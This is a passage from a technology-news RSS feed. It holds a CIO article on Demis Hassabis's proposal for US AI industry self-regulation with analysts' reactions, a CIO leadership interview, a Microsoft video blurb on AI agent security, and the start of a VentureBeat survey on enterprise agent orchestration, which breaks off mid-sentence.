<p class="wp-block-paragraph">“National security is the proposal’s accelerator in Washington and its poison pill abroad: the framing that opens the only gate available at home invites foreign capitals to read the institution as an instrument of American strategy,” he pointed out. </p>



<p class="wp-block-paragraph">“The map is already plural,” he said. “Brussels switches on enforcement powers over general-purpose models [starting in August 2026], London runs the AI Security Institute, and Beijing licenses on its own terms. California and New York have legislated for frontier models at home. The durable route is shared technical evidence with sovereign enforcement, sealed through mutual recognition rather than deference, with India and the other major non-Western markets holding authorship rather than seats.”</p>



<p class="wp-block-paragraph">Gogia added that the rules enacted by even such a group may not address all of the key concerns of enterprise IT. A US government effort along the lines that Hassabis is proposing would result in testing that “sits close to intelligence and industrial policy, and those functions will not stay neatly separated. A model can pass every catastrophic-risk test and still fail the enterprise on privacy, reliability, and liability,” he noted.</p>



<p class="wp-block-paragraph">Walmart’s former director of cybersecurity <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, who is now an independent cybersecurity consultant, said he found the proposal “well-intentioned, but it addresses a highly polarized topic at a time when commercial interests carry unprecedented political influence, which is not always applied benevolently.”</p>



<p class="wp-block-paragraph">He added, “an exclusive US standard that is not globally respected or enforceable would likely fail to achieve its core purpose and would place US companies at a competitive disadvantage.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that a deep dive into how <a href="https://www.finra.org/" target="_blank" rel="noreferrer noopener">FINRA</a> operates today is illustrative of what IT leaders can expect from this effort, assuming the industry adopts that model.</p>



<p class="wp-block-paragraph">“When the CEOs of the five companies that would be regulated are also the primary drafters of the standards, the standards will reflect those companies’ interests. FINRA has an independent board, but the operational reality is that member firm perspectives dominate the working groups that write the actual rules,” he said. “There is no reason to expect an AI equivalent to work differently, and every reason to expect it to work worse, because AI standardization is happening faster than any industry has ever attempted to standardize itself, and speed is the enemy of independent oversight.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was even more emphatically opposed to the Hassabis proposal.</p>



<p class="wp-block-paragraph">“Asking Big Tech companies to self-police is analogous to allowing foxes to guard the henhouse. It hasn’t worked to date, and it won’t work going forward. Expecting these organizations to somehow change their ways at this point in time represents the height of naïve thinking,” Levy said. “The framework proposed by Demis Hassabis is a self-serving roadmap for an industry bent on racing to the AI horizon regardless of the harms caused along the way. It is impossible to quantify the dangers to broader society should frameworks allowing self-regulation become the norm.”</p>



<h2 class="wp-block-heading">Some love the proposal</h2>



<p class="wp-block-paragraph">An almost completely opposite stance came from <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, who applauded the proposed move.</p>



<p class="wp-block-paragraph">“This is one of the rare setups where industry self-regulation has a real shot, and enterprise IT should be enthusiastically rooting for it,” he said. “It fails when harms are externalized, such as in social media content moderation. Or when the overseer outsources judgment to the overseen, such as the FAA’s delegation to Boeing before the 737 MAX. It works when everyone in the industry shares the catastrophic downside.”</p>



<p class="wp-block-paragraph">He suggested, however, that the best precedent here isn’t FINRA, it’s INPO, the Institute of Nuclear Power Operations, which the nuclear industry created within months of the <a href="https://www.nrc.gov/reading-rm/doc-collections/fact-sheets/3mile-isle" target="_blank" rel="noreferrer noopener">1979 Three Mile Island partial reactor meltdown</a> “on the logic that an accident anywhere is an accident everywhere. INPO peer-reviews every US plant, its evaluations move insurance premiums, and it sits on top of the NRC’s statutory floor. That is a public-private stack very close to what Hassabis is describing. Frontier AI has the same structure: one lab’s catastrophic failure brings regulation down on all of them.”</p>



<p class="wp-block-paragraph">For enterprise CIOs and other IT executives, Goryunov said, that model has the potential for being a big win.</p>



<p class="wp-block-paragraph"><strong>“</strong>Today, every enterprise duplicates the same AI diligence of red-teaming, eval suites, governance committees and each does so with less information than any certifying body would have,” Goryunov said. “A credible standards regime does for AI what UL did for electrical equipment and SOC2 did for cloud: it converts an unknowable risk into a procurable product and gives boards a defensible standard of care. That’s not red tape. That’s peace of mind with an audit trail.”</p>



<p class="wp-block-paragraph">However, Mahapatra said, “the countervailing view is that the alternative to industry-led standards is probably not thoughtful legislation. It is probably no standards, or state-by-state fragmentation, or the current pattern of ex-post enforcement actions where regulators surface concerns years after harm has already occurred.” </p>



<p class="wp-block-paragraph">Thus, he noted, “Hassabis is making the reasonable argument that imperfect fast standards are better than perfect slow ones, and there is genuine merit to that view for topics like agent identity, evaluation methodology, and interoperability, which are exactly the areas <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">OpenClaw is also targeting</a>.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepMind CEO pushes for AI industry self-regulation]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis is pushing for the US AI industry to self-regulate, with the support of government, as a starting point for an international creating shared international standards. In a blog post, he called for a focus on artificial general intelligence (AGI) and national secu...]]></description>
<link>https://tsecurity.de/de/3673451/it-nachrichten/deepmind-ceo-pushes-for-ai-industry-self-regulation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673451/it-nachrichten/deepmind-ceo-pushes-for-ai-industry-self-regulation/</guid>
<pubDate>Thu, 16 Jul 2026 14:33:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google DeepMind CEO Demis Hassabis is pushing for the US AI industry to self-regulate, with the support of government, as a starting point for an international creating shared international standards. In a blog post, he called for a focus on <a href="https://www.computerworld.com/article/4174181/google-talks-singularity-while-scaling-up-agentic-ai-for-enterprises-2.html">artificial general intelligence (AGI)</a> and national security. </p>



<p class="wp-block-paragraph">But it is precisely that focus on national security that may make the results of such an effort, assuming it happens, less than palatable outside of the US.</p>



<p class="wp-block-paragraph">“The rapid progress we’re seeing in AI requires a new approach to testing frontier AI model capabilities that is dynamic, adaptable, and rigorous,” <a href="https://demishassabis.substack.com/p/a-framework-for-frontier-ai-and-the-dawning-of-a-new-age" target="_blank" rel="noreferrer noopener">Hassabis wrote</a>. “The US is well positioned, given its economic and technical standing, to take the first step in developing such a framework. It could establish a new Standards Body modelled on a federally overseen public-private partnership or self-regulatory organization, much like the Financial Industry Regulatory Authority (FINRA), with a board that includes independent leading technical experts and open-source representatives.”</p>



<p class="wp-block-paragraph">He noted, however, that the funding would need to be substantial, and would most likely come from industry, to allow the new body to attract world-class technical talent and obtain the necessary compute resources for large-scale testing.</p>



<p class="wp-block-paragraph">Hassabis proposed that the organization “be responsible for developing assessment protocols and working with appropriate federal agencies and the US National Labs to conduct testing in areas relevant to national security,” and that AI vendor participants be encouraged to adopt best practices such as publishing model cards with technical details, maintaining strong internal cybersecurity, vetting key personnel, and providing sufficient resourcing for safety and security research.</p>



<p class="wp-block-paragraph">This is not the first time Hassabis has <a href="https://www.computerworld.com/article/4178398/deepmind-ceo-agi-could-be-here-in-three-years.html" target="_blank">expressed worries about AGI</a>. </p>



<p class="wp-block-paragraph">DeepMind was involved in an earlier <a href="https://www.cio.com/article/4168122/us-government-agency-to-safety-test-frontier-ai-models-before-release.html" target="_blank">US government initiative evaluating AI safety</a>, alongside Microsoft and xAI (now SpaceXAI) working with the Center for AI Standards and Innovation (CAISI), a division of the US Department of Commerce. It allowed CAISI to conduct pre-deployment evaluations and targeted research to “better assess frontier AI capabilities and advance the state of AI security.”  </p>



<h2 class="wp-block-heading">The rest of the world may have concerns</h2>



<p class="wp-block-paragraph">Analysts and consultants were mixed about the move, with most expressing concerns about whether an industry-focused group would prioritize the public’s best interests.</p>



<p class="wp-block-paragraph">“Self-regulation is not viable because it implies everyone is able to regulate themselves and will do so in line with the best interests of the public. Most tech vendors don’t have the capacity to self-regulate. They would just prefer a set of rules within which they can operate,” said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>. “For-profit organizations are required to do what is best for their shareholders, and external regulation ensures that those organizations are never in a conflict of interest where they have to choose between what is good for their shareholders and what is good for the public.”</p>



<p class="wp-block-paragraph">And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, given the international nature of AI models, an effort coordinated by the US government might alienate other countries. </p>



<p class="wp-block-paragraph">“National security is the proposal’s accelerator in Washington and its poison pill abroad: the framing that opens the only gate available at home invites foreign capitals to read the institution as an instrument of American strategy,” he pointed out. </p>



<p class="wp-block-paragraph">“The map is already plural,” he said. “Brussels switches on enforcement powers over general-purpose models [starting in August 2026], London runs the AI Security Institute, and Beijing licenses on its own terms. California and New York have legislated for frontier models at home. The durable route is shared technical evidence with sovereign enforcement, sealed through mutual recognition rather than deference, with India and the other major non-Western markets holding authorship rather than seats.”</p>



<p class="wp-block-paragraph">Gogia added that the rules enacted by even such a group may not address all of the key concerns of enterprise IT. A US government effort along the lines that Hassabis is proposing would result in testing that “sits close to intelligence and industrial policy, and those functions will not stay neatly separated. A model can pass every catastrophic-risk test and still fail the enterprise on privacy, reliability, and liability,” he noted.</p>



<p class="wp-block-paragraph">Walmart’s former director of cybersecurity <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, who is now an independent cybersecurity consultant, said he found the proposal “well-intentioned, but it addresses a highly polarized topic at a time when commercial interests carry unprecedented political influence, which is not always applied benevolently.”</p>



<p class="wp-block-paragraph">He added, “an exclusive US standard that is not globally respected or enforceable would likely fail to achieve its core purpose and would place US companies at a competitive disadvantage.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that a deep dive into how <a href="https://www.finra.org/" target="_blank" rel="noreferrer noopener">FINRA</a> operates today is illustrative of what IT leaders can expect from this effort, assuming the industry adopts that model.</p>



<p class="wp-block-paragraph">“When the CEOs of the five companies that would be regulated are also the primary drafters of the standards, the standards will reflect those companies’ interests. FINRA has an independent board, but the operational reality is that member firm perspectives dominate the working groups that write the actual rules,” he said. “There is no reason to expect an AI equivalent to work differently, and every reason to expect it to work worse, because AI standardization is happening faster than any industry has ever attempted to standardize itself, and speed is the enemy of independent oversight.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was even more emphatically opposed to the Hassabis proposal.</p>



<p class="wp-block-paragraph">“Asking Big Tech companies to self-police is analogous to allowing foxes to guard the henhouse. It hasn’t worked to date, and it won’t work going forward. Expecting these organizations to somehow change their ways at this point in time represents the height of naïve thinking,” Levy said. “The framework proposed by Demis Hassabis is a self-serving roadmap for an industry bent on racing to the AI horizon regardless of the harms caused along the way. It is impossible to quantify the dangers to broader society should frameworks allowing self-regulation become the norm.”</p>



<h2 class="wp-block-heading">Some love the proposal</h2>



<p class="wp-block-paragraph">An almost completely opposite stance came from <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, who applauded the proposed move.</p>



<p class="wp-block-paragraph">“This is one of the rare setups where industry self-regulation has a real shot, and enterprise IT should be enthusiastically rooting for it,” he said. “It fails when harms are externalized, such as in social media content moderation. Or when the overseer outsources judgment to the overseen, such as the FAA’s delegation to Boeing before the 737 MAX. It works when everyone in the industry shares the catastrophic downside.”</p>



<p class="wp-block-paragraph">He suggested, however, that the best precedent here isn’t FINRA, it’s INPO, the Institute of Nuclear Power Operations, which the nuclear industry created within months of the <a href="https://www.nrc.gov/reading-rm/doc-collections/fact-sheets/3mile-isle" target="_blank" rel="noreferrer noopener">1979 Three Mile Island partial reactor meltdown</a> “on the logic that an accident anywhere is an accident everywhere. INPO peer-reviews every US plant, its evaluations move insurance premiums, and it sits on top of the NRC’s statutory floor. That is a public-private stack very close to what Hassabis is describing. Frontier AI has the same structure: one lab’s catastrophic failure brings regulation down on all of them.”</p>



<p class="wp-block-paragraph">For enterprise CIOs and other IT executives, Goryunov said, that model has the potential for being a big win.</p>



<p class="wp-block-paragraph"><strong>“</strong>Today, every enterprise duplicates the same AI diligence of red-teaming, eval suites, governance committees and each does so with less information than any certifying body would have,” Goryunov said. “A credible standards regime does for AI what UL did for electrical equipment and SOC2 did for cloud: it converts an unknowable risk into a procurable product and gives boards a defensible standard of care. That’s not red tape. That’s peace of mind with an audit trail.”</p>



<p class="wp-block-paragraph">However, Mahapatra said, “the countervailing view is that the alternative to industry-led standards is probably not thoughtful legislation. It is probably no standards, or state-by-state fragmentation, or the current pattern of ex-post enforcement actions where regulators surface concerns years after harm has already occurred.” </p>



<p class="wp-block-paragraph">Thus, he noted, “Hassabis is making the reasonable argument that imperfect fast standards are better than perfect slow ones, and there is genuine merit to that view for topics like agent identity, evaluation methodology, and interoperability, which are exactly the areas <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">OpenClaw is also targeting</a>.”</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.cio.com/article/4197497/deepmind-ceo-pushes-for-ai-industry-self-regulation.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What next-generation IT leadership looks like]]></title>
<description><![CDATA[Today’s CIOs must master a complex balancing act of maintaining operational excellence while enabling AI experimentation, modernizing legacy environments while accelerating innovation, leading workforce transformation while maintaining culture, and communicating fluently across boards, business u...]]></description>
<link>https://tsecurity.de/de/3672917/it-nachrichten/what-next-generation-it-leadership-looks-like/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672917/it-nachrichten/what-next-generation-it-leadership-looks-like/</guid>
<pubDate>Thu, 16 Jul 2026 11:18:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Today’s CIOs must master a complex balancing act of maintaining operational excellence while enabling AI experimentation, modernizing legacy environments while accelerating innovation, leading workforce transformation while maintaining culture, and communicating fluently across boards, business units, customers, and technical teams alike.</p>



<p class="wp-block-paragraph">Few leaders understand this balancing act better than former Verizon CIO Jane Connell. Over her career, Connell has helped some of the world’s largest enterprises modernize operations, reduce complexity, and transform how technology enables business value at scale. As a <a href="https://www.cio.com/article/236876/cio-hall-of-fame-honorees.html">2026 CIO Hall of Fame inductee</a>, she is widely respected not only for operational excellence and strategic vision but also for her commitment to mentoring, workforce transformation, and preparing the next generation of leaders for a rapidly changing future.</p>



<p class="wp-block-paragraph">On a recent episode of <a href="https://linktr.ee/techwhisperers">the Tech Whisperers podcast</a>, we unpacked Connell’s unconventional leadership story and the playbook that has shaped one of technology’s most impactful leaders. In this exclusive interview after the show, edited for length and clarity, Connell shares more lessons from her Hall of Fame journey and why she believes the future of technology leadership will depend less on org charts and more on curiosity, credibility, and human connection.</p>



<p class="wp-block-paragraph"><strong>Dan Roberts: When you think about preparing the next generation of technology leaders, what capabilities or mindsets do you believe will matter most in this next era?</strong></p>



<p class="wp-block-paragraph"><strong>Jane Connell:</strong> One is curiosity, or what I call the “why” factor: What do we need to do and why do we need to do it? It’s having a mindset of unlocking the art of the possible. You must be comfortable with what you know, what you don’t know, and asking the question why, because in this era of AI and where technology is going, it’s not about automating things you know; it’s about what you don’t already know, and what that unlocks. AI creates patterns and opportunities and re-engineers through its own intelligence, so there has to be a lot of instinct involved, and you’re going to have to understand and learn what it’s telling you.</p>



<p class="wp-block-paragraph">I’m on the board of Rutgers, and one of the conversations we’re in with future leaders in education is that <a href="https://www.cio.com/article/4047844/ai-is-taking-over-junior-positions-in-it.html">you don’t have those entry-level jobs anymore</a>. They’re going to be AI. But those were building blocks for us. <a href="https://www.cio.com/article/4189865/how-ai-automation-is-reshaping-the-it-leadership-pipeline.html">We came up the ranks and did those jobs</a>, and that created the knowledge. [Future leaders are] not going to have that, so how do you create the foundation of knowledge — which is that art of asking why or what — to question if the bots or the patterns are biased or wrong. You’re not going to have the experience to rely on and say, “That’s wrong; I know that’s wrong because I did those. I know how this operates.”</p>



<p class="wp-block-paragraph">Second is having humility and being comfortable in your skin — that you don’t know everything, but you’re going to learn it. You’re going to involve yourself with people. It’s about workforce structure, not organizational structure. Who do you need to talk to, and what do you have to find out?</p>



<p class="wp-block-paragraph">I also believe <a href="https://www.cio.com/article/652317/cio-brett-lansings-five-point-approach-to-building-followership.html">followership</a> is going to be huge, because the way work gets done is not hierarchical. It’s going to be engineered based on the process and AI. You have to create followership of people working together, and they’ve got to want to work with you. This isn’t going be “you work for me, do as I say.” Followership is going to be a key skill for influencing and organically having that kind of impact, versus someone with authority.</p>



<p class="wp-block-paragraph">With that is the accountability to have high integrity, be credible, and be a person someone would trust. Because all this is going to break down the hierarchy of authority, you have to bring that human side and be a really good leader, which means people want to follow you, they trust you, they want to work with you, and they know you’re going to take them to a better place.</p>



<p class="wp-block-paragraph"><strong>One recurring theme throughout your career has been your ability to bridge deep technology expertise with strong business acumen. Why is that combination becoming even more critical in the age of AI and digital transformation?</strong></p>



<p class="wp-block-paragraph">You can’t impact anything tech-alone. It all resides on having business acumen and then having the technical ability to know how to use tech to solve the problem, not the other way around.</p>



<p class="wp-block-paragraph">At the root of all this is every company’s Achilles’ heel: the data. Access to data has been a privilege — those who have it, those who don’t. Now you’re bringing structured and unstructured [data] together for these AI models to work, and that’s a new skill set that requires you to know the business inside and outside.</p>



<p class="wp-block-paragraph">You also have to stay externally relevant and know where innovation is coming from. And you’re going to need to know how to architect that into the way your company goes to market, which requires you to know the business processes, how it runs, and how it could run.</p>



<p class="wp-block-paragraph">That’s the role of leaders moving forward, immersing yourself in the problems the business needs to solve. There’s no boundaries there. It’s not what department you report in and what process you own. It’s seamless. That’s the duality people need to command and grow into.</p>



<p class="wp-block-paragraph"><strong>Looking back on a career that spans multiple industries with different operating models, cultures, and regulatory environments, what were some of the most important calculated risks you took in terms of your growth?</strong></p>



<p class="wp-block-paragraph">There were two pivotal moments in my career that were the biggest risks but probably my biggest gains in growth. One was when I went into a full-time tech role and ran infrastructure. I was a fish out of water, and not the likely successor. Part of the reason I did it goes back to a something we talked about on the podcast: Well, why <em>not</em> me? And I want more. That’s just my tenacity.</p>



<p class="wp-block-paragraph">It was during the dot-com days of the late 90s, early 2000s. It didn’t matter if you were the CEO or a board director, if you didn’t know tech and you didn’t understand how to wield it, you were never going to be successful. I knew that no matter what job I may want in the future, I had to know tech. So it was a calculated decision: I’m going to jump into tech.</p>



<p class="wp-block-paragraph">Some very senior supply chain leaders who controlled my career told me, “You’re going to fail, and I’ll have a safety net for you when you come back.” Well, I didn’t fail and I never went back. That pressure was there, but I knew why I was doing it. This wasn’t just a job for ego’s sake. This was, I have to know tech. The future is tech. It’s kind of like AI now.</p>



<p class="wp-block-paragraph">The other pivotal moment was changing industries. I left Johnson &amp; Johnson at a great time. We had gone through a huge transformation, started our global services organization, and the perfect moment happened for me to retire early there. I didn’t know what I wanted to do. It was the first time I took a break in my career to let the world come to me instead of me planning it. Do I want to open a business? Do I want to consult? Do I want to stay retired? I was fortunate enough that I could, but I got bored.</p>



<p class="wp-block-paragraph">The financial industry wasn’t on my radar. Coming out of healthcare, with the purpose and the connection with saving lives, helping people, it’s easy to connect to. Financial wasn’t, for me. But one of the executive search firms said to me, when you interview, the biggest question hanging over your head is going to be, could you be successful elsewhere because you grew up in J&amp;J. You had advocates, you had influence, you knew the industry. It’s like your deck was stacked for you. Could you do all that when you’re a nobody coming off the street?</p>



<p class="wp-block-paragraph">So when the CIO role opened at State Street, I interviewed — and talk about being your authentic self. I had already done all this transformation, I already knew the outcomes, I knew everything I did was always enterprise and always end-to-end transformation. And because I wasn’t really vying for the job, I was having this conversation with the CFO and saying, “Here’s what your organization is lacking, here’s the noise you’re going to hear, do you really have the appetite for it?” And “I’d like talk to the COO and see if they’re ready to hear this about the value chain. I may not know your problem yet, but I guarantee it’s one of these three things.”</p>



<p class="wp-block-paragraph">I was testing their advocacy of, do you really want to transform? Are you ready? Because you have to own this. I can’t take accountabilities for your organizations. I can help you get there. I’m an enabler for you, but you have to own it. And it was a very different interview. By the end of it, I loved Ron [O’Hanley, State Street Chairman and CEO] and his whole team. I took the job on the leadership and the person more than the industry, and it was very successful.</p>



<p class="wp-block-paragraph">I followed the same recipe when I went to Verizon. Those were big growing moments. They were risky, they were very uncomfortable, but it was the biggest growth that I’ve ever had.</p>



<p class="wp-block-paragraph"><strong>Whether it’s a tough message to the C-suite, a difficult conversation with peers, or helping teams make sense of uncertainty and change, you tell people the truth in a way they can hear it. How can other leaders develop that ability to take people on the journey, especially when the message isn’t easy?</strong></p>



<p class="wp-block-paragraph">Skirting a problem is not the way to solve it. I’ve never been the person to say what you want to hear. I’ll tell you how you get there, and I’ll get you the results you want, but I’m going to be super honest because I want to manage the expectations of what we have to achieve.</p>



<p class="wp-block-paragraph">What I’ve learned as a leader is to take accountability. Say what you’re going to do, then do it, and if you hit a roadblock, be the first to call it. That gets you access, because people see it as a calculated risk. Anybody in the C-suite has resources and budget, but the earlier you signal and don’t waste money and resources, the more access to people and resources you will have.</p>



<p class="wp-block-paragraph">The greatest lesson I learned from one of the leaders in my path was: If you can’t say it in an elevator, and you can’t say it on one slide, you’re talking too much. So, think about it as one slide: What is it you need? What are you going to achieve? What are the risks? What are you taking accountability for? How will you measure it? It doesn’t matter what the message is when you can be that succinct. You’ve got them laser-focused on what it is. You gave them just enough of the periphery to know how you got there, and then it’s their belief in you that you can do it if they give you the money and resources, because that’s what you’re looking for.</p>



<p class="wp-block-paragraph">It sounds so simple but putting things together succinctly is hard work. You have to take all the unnecessary noise out, and keep the conversation focused. You don’t want their mind wandering, wondering where is she going, or what are they doing? Give it to them upfront and tell them what you need.</p>



<p class="wp-block-paragraph"><strong>You’ve spoken about entering corporate environments early in your career feeling intimidated by people with more traditional credentials or educational backgrounds. What advice can you give rising leaders about battling imposter syndrome?</strong></p>



<p class="wp-block-paragraph">Take the time to figure out what makes you uncomfortable, what makes you feel like an imposter, or what in that meeting you dread going in where you’re not acting like yourself. Are you more quiet than usual? Are you not asking the question you’d normally ask? Figure out what those issues are, and then address the things that make you uncomfortable. I went to college later because that bothered me. Those credentials do matter. So I addressed it and got my degrees and certifications.</p>



<p class="wp-block-paragraph">The other thing is to find people you trust, people whose opinion you respect, and bring them on the inside of what you’re working on. Maybe it’s dealing with a difficult business partner. You may not particularly want to be friends with them, but you’re going to have to work with them. Find the people that work effectively with them. You do this with high integrity — this is not about talking about that person — but find the allies that work with them. Nine times out of ten, they feel the way you do, but they found a way to work with the person. Pick their brain. Bring them in the fold and say, “I need this alliance. I can’t get there, and quite frankly, I know I’m resisting because maybe I just don’t like them. How did you get there?”</p>



<p class="wp-block-paragraph">People are generous. Ask their opinion, ask how they’re showing up. “Am I creating the trigger? Is there something I’m doing in that meeting or in that room that I’m not coming out with a decision or whatever I needed?”</p>



<p class="wp-block-paragraph">The greatest gift is feedback. There’s feedback you do something with, and there’s feedback you don’t, but either way, it’s a gift. Somebody’s giving it to you. It’s not personal; it’s business. And those things really help build your confidence and leadership style.</p>



<p class="wp-block-paragraph"><em>In an era increasingly shaped by automation and disruption, Jane Connell believes the most enduring competitive advantage may come from something deeply human: the ability to inspire confidence, curiosity, resilience, and possibility in others. For more advice from this Hall of Fame CIO, tune in to the </em><a href="https://linktr.ee/techwhisperers"><em>Tech Whisperers podcast</em></a><em>.</em></p>



<p class="wp-block-paragraph">See also:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4185905/mastering-the-chess-of-it-leadership-today.html">Mastering the chess of IT leadership today</a></li>



<li><a href="https://www.cio.com/article/4176073/developing-a-customer-first-culture-for-it.html">Developing a customer-first culture for IT</a></li>



<li><a href="https://www.cio.com/article/4166851/coherence-where-leadership-and-ai-success-intersect.html">Coherence: Where leadership and AI success intersect</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unlock AI agents without sacrificing security]]></title>
<description><![CDATA[Author: Microsoft Security - Bewertung: 0x - Views:0 Learn how Microsoft Entra helps you discover shadow AI agents, govern agent permissions, keep BYOD and endpoint-based agents in scope, and apply Conditional Access to AI prompts and responses. Then see how Microsoft Purview provides visibility ...]]></description>
<link>https://tsecurity.de/de/3672036/it-security-video/unlock-ai-agents-without-sacrificing-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672036/it-security-video/unlock-ai-agents-without-sacrificing-security/</guid>
<pubDate>Thu, 16 Jul 2026 00:47:06 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Microsoft Security - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/AJx5PYKm1Cw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Learn how Microsoft Entra helps you discover shadow AI agents, govern agent permissions, keep BYOD and endpoint-based agents in scope, and apply Conditional Access to AI prompts and responses. Then see how Microsoft Purview provides visibility into agent activity, strengthens runtime data protection, helps detect agentic risk, and supports auditability across local agents developed on GitHub Copilot CLI, Claude Code, OpenAI Codex, and OpenClaw. Walk away with practical ways to unlock AI agents while keeping access and data protection aligned with your enterprise security needs.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic orchestration: Enterprise AI organizations have a deployment problem, not a platform problem — and most are calling chatbots agents]]></title>
<description><![CDATA[Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agen...]]></description>
<link>https://tsecurity.de/de/3672033/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672033/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</guid>
<pubDate>Thu, 16 Jul 2026 00:46:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agents” are still chatbot wrappers, the control plane enterprises expect is deliberately hybrid to avoid lock-in, and real-time fiscal control over token burn remains the exception.</p><p>This wave of VentureBeat Pulse Research examines enterprise agent orchestration: which platforms enterprises run on, what drives the choice, what they optimize for, how they expect agent control to be structured, and — most revealingly — how orchestrated their deployed “agents” actually are and how tightly they control the cost of running them.</p><p>The central finding is a gap between orchestration ambition and orchestration reality. Enterprises are consolidating fast onto the major model platforms: Anthropic’s Claude is the primary platform for 40%, more than double any rival, followed by Microsoft (18%) and OpenAI (13%). The choice is driven by “model gravity” — native alignment with a state-of-the-art base model (21%) — and success is judged by reliable, multi-step execution (task completion reliability 32%, multi-step workflow management 28%). Yet asked to assess their portfolios honestly, 71% say a quarter or fewer of their deployed “agents” are true multi-step orchestrated workflows rather than single-prompt chatbot wrappers, and only 10% have crossed the halfway mark. The orchestration layer is being built well ahead of the orchestrated portfolio it is meant to run.</p><p>That gap shapes the architecture enterprises are putting in place. By the end of 2026 a clear majority (51%) expect a hybrid control plane — provider-native plus external orchestration — and only 6% expect to hand control to a provider-managed service, because vendor lock-in (35%) is the risk they fear most if control lives inside a model provider. Investment follows the build-out: agent workflow tooling leads the spend (34%), with security and permissions enforcement (25%) behind. And fiscal control lags throughout — more than a quarter (27%) have no real-time way to stop a runaway agent before the bill arrives.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent orchestration. Responses are filtered to organizations with 100 or more employees (n=101), drawn from a single June 2026 wave; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends.</p><p>By organization size the sample is spread evenly across the enterprise bands: 100–499 employees, 2,500–9,999, and 50,000+ (21% each), with 10,000–49,999 and 500–2,499 (19% each). By role it is senior and buyer-credible: product and program managers (15%), CIO/CTO/CISO (13%), consultants and advisors (13%), and a spread of data, AI, and engineering directors and VPs, with an “Other” function at 18%. On purchasing, 81% are recommenders, influencers, or final decision-makers for AI solutions (66% recommender/influencer, 15% final decision-maker). Technology/Software is the largest industry at 44%, followed by Financial Services (17%) and Healthcare/Life Sciences (8%).</p><p>At 101 respondents the sample is robust enough to read directionally with reasonable confidence, though it remains self-selected and is not a probability sample.</p><h2>Finding 1: Orchestration runs on model-provider platforms</h2><p><b>Anthropic’s Claude leads; open frameworks are marginal</b></p><p>We asked which agent orchestration platform enterprises primarily use today. The answer concentrates on the major model providers — and on one in particular.</p><div></div><p>A note on reading these 